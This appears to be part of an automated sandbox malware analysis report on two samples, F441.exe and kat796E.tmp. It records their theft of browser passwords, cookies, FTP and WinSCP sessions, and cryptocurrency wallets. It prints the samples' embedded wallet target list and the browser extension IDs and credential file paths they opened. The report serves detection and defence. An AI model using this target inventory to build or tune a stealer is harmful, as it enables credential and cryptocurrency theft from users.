Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Opens network shares

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: \\config\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: \\config\			Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
